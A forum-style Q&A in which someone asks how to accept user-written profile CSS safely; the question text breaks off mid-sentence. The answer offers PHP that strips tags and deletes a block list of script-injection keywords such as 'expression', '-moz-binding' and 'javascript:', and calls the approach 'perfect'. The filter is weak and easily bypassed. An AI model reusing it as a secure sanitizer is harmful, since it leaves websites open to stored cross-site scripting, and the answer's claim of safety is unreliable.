How do I ensure user input is CSS and not malicious code?

Question

On my website I want to include a text box that will allow the members to change anything they want css wise on their profiles....but I don\'t want to wake up one morning to

Answer 1

I guess this should be enough

$style = $_POST['style'];

$style = strip_tags($style);

    $forbiddenStuff = array(
        '-moz-binding',
        'expression',
        'javascript:',
        'behaviour:',
        'vbscript:',
        'mocha:',
        'livescript:',
    );

    $style = str_ireplace($forbiddenStuff, '', $style);

store $style in db , and render on user profile.

Please note that this solution is copied from a well known software and which has a big community, so i hope this should be perfect.